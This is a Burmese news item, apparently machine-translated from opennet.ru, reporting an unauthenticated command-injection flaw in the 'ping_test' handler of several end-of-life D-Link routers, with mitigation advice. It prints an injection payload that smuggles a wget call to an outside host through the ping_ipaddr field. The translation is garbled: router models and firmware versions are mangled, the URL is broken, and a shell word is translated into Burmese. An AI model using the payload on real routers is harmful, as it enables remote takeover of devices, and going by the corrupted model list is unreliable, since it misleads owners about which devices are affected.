D-Link ကြိုးမဲ့ရောက်တာများတွင် အန္တရာယ်ရှိသော အားနည်းချက် () အထူးတောင်းဆိုချက်တစ်ခုပေးပို့ခြင်းဖြင့် စက်ပစ္စည်းဘက်ရှိ ကုဒ်ကို အဝေးထိန်းစနစ်ဖြင့် လုပ်ဆောင်နိုင်စေမည့် “ping_test” ကိုင်တွယ်သူထံသို့ အထောက်အထားမခိုင်လုံဘဲ ဝင်ရောက်အသုံးပြုနိုင်ပါသည်။
စိတ်ဝင်စားစရာမှာ၊ firmware developer များအဆိုအရ၊ "ping_test" ခေါ်ဆိုမှုကို စစ်မှန်ကြောင်းအထောက်အထားပြပြီးမှသာ လုပ်ဆောင်သင့်သည်၊ သို့သော် လက်တွေ့တွင် ဝဘ်အင်တာဖေ့စ်သို့ဝင်ရောက်ခြင်းမပါဝင်ဘဲ မည်သည့်ကိစ္စတွင်မဆို ၎င်းကို ခေါ်ဆိုခြင်းဖြစ်သည်။ အထူးသဖြင့်၊ apply_sec.cgi script ကိုဝင်ရောက်ပြီး “action=ping_test” ကန့်သတ်ဘောင်ကိုဖြတ်သောအခါ၊ script သည် authentication page သို့ပြန်ညွှန်းသည်၊ သို့သော်တစ်ချိန်တည်းတွင် ping_test နှင့်ဆက်စပ်သောလုပ်ဆောင်ချက်ကိုလုပ်ဆောင်သည်။ ကုဒ်ကိုလုပ်ဆောင်ရန်၊ စမ်းသပ်ရန်အတွက်ပေးပို့သော IP လိပ်စာ၏မှန်ကန်မှုကို ကောင်းစွာမစစ်ဆေးဘဲ ping_test ကိုယ်တိုင်ခေါ်သည့် အခြားအားနည်းချက်တစ်ခုကို ping_test ကိုယ်တိုင်အသုံးပြုခဲ့သည်။ ဥပမာအားဖြင့်၊ wget utility ကိုခေါ်ဆိုပြီး “echo 1234” ညွှန်ကြားချက်၏ရလဒ်များကို ပြင်ပ host တစ်ခုသို့ လွှဲပြောင်းရန်၊ “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// ကန့်သတ်ဘောင်ကို သတ်မှတ်ပါ။ test.test/?$(ပဲ့တင်သံ 1234)"။
အားနည်းချက်ရှိနေခြင်းကို အောက်ပါပုံစံများတွင် တရားဝင်အတည်ပြုထားသည်။
- firmware 655b3.02 နှင့်အထက် DIR-05;
- ဖိုင်းဝဲ 866b1.03 သို့မဟုတ် အထက်ရှိသော DIR-04L၊
- Firmware 1565 နှင့်အထက်ရှိသော DIR-1.01
- DIR-652 (ပြဿနာရှိသော firmware ဗားရှင်းများအကြောင်း အချက်အလက်များ ပေးမထားပါ)
ဤမော်ဒယ်များအတွက် ပံ့ပိုးမှုကာလသည် သက်တမ်းကုန်ဆုံးသွားပြီဖြစ်သောကြောင့် D-Link အားနည်းချက်ကို ဖယ်ရှားရန် ၎င်းတို့အတွက် အပ်ဒိတ်များကို ထုတ်ပြန်မည်မဟုတ်သော်လည်း ၎င်းတို့ကို အသုံးပြုရန် အကြံပြုခြင်းမရှိသည့်အပြင် ၎င်းတို့အား စက်အသစ်များဖြင့် အစားထိုးရန် အကြံပြုထားသည်။ လုံခြုံရေးဖြေရှင်းချက်အနေဖြင့်၊ သင်သည် ယုံကြည်စိတ်ချရသော IP လိပ်စာများကိုသာ ဝဘ်အင်တာဖေ့စ်သို့ ဝင်ရောက်ခွင့်ကို ကန့်သတ်နိုင်သည်။
နောက်ပိုင်းတွင် အားနည်းချက်လည်း ရှိနေကြောင်း တွေ့ရှိခဲ့သည်။ မော်ဒယ်များ DIR-855L၊ DAP-1533၊ DIR-862L၊ DIR-615၊ DIR-835 နှင့် DIR-825 တို့သည် မသိရသေးသည့် အပ်ဒိတ်များကို ထုတ်ဝေရန် စီစဉ်နေသည်။
source: opennet.ru